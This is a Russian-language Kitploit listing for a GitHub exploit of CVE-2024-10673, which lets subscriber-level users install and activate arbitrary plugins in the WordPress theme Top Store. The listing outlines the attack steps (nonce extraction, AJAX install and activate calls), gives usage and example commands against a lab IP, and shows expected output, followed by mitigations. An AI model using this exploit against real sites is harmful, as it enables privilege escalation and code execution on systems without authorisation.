Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10673 — Top Store <= 1.5.4 - Аутентифицированная (Subscriber+) произвольная установка/активация плагинов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-10673
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubnxploited/cve-2024-10673

CVE-2024-10673

Top Store <= 1.5.4 - Аутентифицированная (Subscriber+) произвольная установка/активация плагинов

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 Обзор

Этот скрипт эксплуатирует CVE-2024-10673, критическую уязвимость, обнаруженную в теме WordPress Top Store (<= 1.5.4). Недостаток позволяет аутентифицированным пользователям с уровнем доступа "подписчик" или выше устанавливать и активировать произвольные плагины через незащищённые AJAX-запросы.

⚠️ Серьёзность и влияние

  • Неаутентифицированная установка плагинов: Злоумышленники с привилегиями подписчика могут устанавливать плагины без одобрения администратора.
  • Возможность удалённого выполнения кода (RCE): Если установлен вредоносный плагин, атакующие могут выполнить произвольный код.
  • Повышение привилегий: Атакующие могут установить плагины, предоставляющие им административный доступ.

🛠️ Возможности эксплойта

  • Автоматизирует атаку за счёт динамического извлечения необходимого nonce.
  • Позволяет выбирать плагин (пользователь может указать, какой плагин установить и активировать).
  • Поддерживает ответы в формате JSON для структурированного логирования.
  • Корректно обрабатывает ошибки, обеспечивая надёжное выполнение.

⚡ Как работает эксплойт

  1. Вход в WordPress с использованием действительных учётных данных.
  2. Извлечение AJAX nonce из themes.php?page=thunk_started.
  3. Отправка AJAX-запроса на установку плагина (по умолчанию: hunk-companion или заданный пользователем плагин).
  4. Отправка ещё одного запроса на активацию плагина.
  5. Вывод JSON-ответов с указанием успеха или неудачи.

🚀 Использование

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

Примеры

  • Установка и активация плагина по умолчанию (hunk-companion):
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • Установка и активация конкретного плагина (woocommerce):
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 Ожидаемый вывод

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 Меры защиты

Для обеспечения безопасности вашего сайта WordPress:

  • Обновите тему Top Store до исправленной версии.
  • Ограничьте права подписчиков, чтобы предотвратить ненужный доступ.
  • Отслеживайте установленные плагины на предмет несанкционированных изменений.
  • Отключите установку плагинов для неадминистраторов.

⚠️ Отказ от ответственности

Данный скрипт предназначен только для образовательных целей и исследований в области безопасности. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете явного разрешения, является незаконным. Используйте ответственно!

Автор: Khaled Alenazi (Nxploit)

Скачать инструмент